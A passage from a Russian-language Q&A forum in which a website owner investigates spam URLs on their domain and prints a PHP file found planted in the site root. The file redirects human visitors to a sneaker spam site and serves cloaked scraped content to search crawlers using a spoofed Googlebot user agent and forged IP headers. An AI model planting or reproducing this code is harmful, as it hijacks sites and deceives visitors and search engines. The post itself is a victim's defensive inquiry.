URL-адрес спама не отображается во внешних ссылках - PullRequest
Новая
       13

URL-адрес спама не отображается во внешних ссылках

0 голосов
/ 27 апреля 2018

Я нашел URL-адрес спама , используя имя домена сайта ... проверьте здесь: URL Поиск по сайту

Я думал об URL-адресе, но не смог увидеть их в моих внешних ссылках !

  • Я полагаю, это от плагина WordPress? Как быть уверенным?
  • Это еще одна техника спама, о которой я не знаю?

Спасибо за совет

1 Ответ

0 голосов
/ 27 апреля 2018

Хорошо, я нашел часть ответа ... В корневой домен был добавлен новый файл, содержащий этот тип файла: 

<?php

$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']);

if((strpos($tmp, 'bot') != true)){

echo '<script language="javascript" type="text/javascript"> window.location.href="http://www.max270shoes.com/#0425"; </script>
' . "\n";

}

function gethttpcnt($url,$username = '',$password = '',$timeout = 10){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch,CURLOPT_REFERER,"http://www.google.com");
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:66.249.72.240', 'CLIENT-IP:66.249.72.240'));
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    $cnt = curl_exec($ch);
    curl_close($ch);
    return $cnt;
}

$fromsite="http://moresneakers.com/project/nike-wmns-air-max-97-ultra-wold-greymarina-blue-917704-001/";

$website="http://moresneakers.com/";



 $pageURL = 'http';

 if ($_SERVER["HTTPS"] == "on")

    {

        $pageURL .= "s";

    }

$pageURL .= "://";

$sss= $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];

$sss=$pageURL . str_replace("index.php","",$sss); 

$ss=$_SERVER['PHP_SELF'];

$ss=str_replace("index.php","",$ss); 

$otherstring=$fromsite;

$content=gethttpcnt($otherstring);
$content=str_replace("\"images/","\"" . $website . "/images/",$content);
$content=str_replace("\"/images/","\"" . $website . "/images/",$content);
$content=str_replace("\"../images/","\"" . $website . "/images/",$content);
$content=str_replace("\"Images/","\"" . $website . "/images/",$content);
$content=str_replace("\"/Images/","\"" . $website . "/images/",$content);
$content=str_replace("\"../Images/","\"" . $website . "/images/",$content);
$content=str_replace("\"includes/templates/","\"" . $website . "/includes/templates/",$content);
$content=str_replace("\"/includes/templates/","\"" . $website . "/includes/templates/",$content);
$content=str_replace("\"../includes/templates/","\"" . $website . "/includes/templates/",$content);
$content=str_replace("\"min/","\"" . $website . "min/",$content);
$content=str_replace("\"media/","\"" . $website . "/images/",$content);
$content=str_replace("\"/media/","\"" . $website . "/images/",$content);
$content=str_replace("\"../media/","\"" . $website . "/images/",$content);
$content=str_replace("\"css/","\"" . $website . "/css/",$content);
$content=str_replace("\"/css/","\"" . $website . "/css/",$content);
$content=str_replace("\"../css/","\"" . $website . "/css/",$content);
$content=str_replace("\"skin/","\"" . $website . "/images/",$content);
$content=str_replace("\"/skin/","\"" . $website . "/images/",$content);
$content=str_replace("\"../skin/","\"" . $website . "/images/",$content);
$content=str_replace("\"js/","\"" . $website . "/images/",$content);
$content=str_replace("\"/js/","\"" . $website . "/images/",$content);
$content=str_replace("\"../js/","\"" . $website . "/images/",$content);
$content=str_replace("'images/","'" . $website . "/images/",$content);
$content=str_replace("'/images/","'" . $website . "/images/",$content);
$content=str_replace("'../images/","'" . $website . "/images/",$content);
$content=str_replace("'Images/","'" . $website . "/images/",$content);
$content=str_replace("'/Images/","'" . $website . "/images/",$content);
$content=str_replace("'../Images/","'" . $website . "/images/",$content);
$content=str_replace("'includes/templates/","'" . $website . "/includes/templates/",$content);
$content=str_replace("'/includes/templates/","'" . $website . "/includes/templates/",$content);
$content=str_replace("'../includes/templates/","'" . $website . "/includes/templates/",$content);
$content=str_replace("'min/","'" . $website . "min/",$content);
$content=str_replace("'media/","'" . $website . "/images/",$content);
$content=str_replace("'/media/","'" . $website . "/images/",$content);
$content=str_replace("'../media/","'" . $website . "/images/",$content);
$content=str_replace("'skin/","'" . $website . "/images/",$content);
$content=str_replace("'/skin/","'" . $website . "/images/",$content);
$content=str_replace("'../skin/","'" . $website . "/images/",$content);
$content=str_replace("'js/","'" . $website . "/images/",$content);
$content=str_replace("'/js/","'" . $website . "/images/",$content);
$content=str_replace("'../js/","'" . $website . "/images/",$content);
$content=str_replace('href="/','href="' . $website,$content);
$content=str_replace('"' . $fromsite . '"','"' . $sss . '"',$content);
$content=str_replace("'" . $fromsite . "'","'" . $sss . "'",$content);
echo $content;

?>

Мне все еще интересно, как они добавили эти файлы ... Админ взломан?

...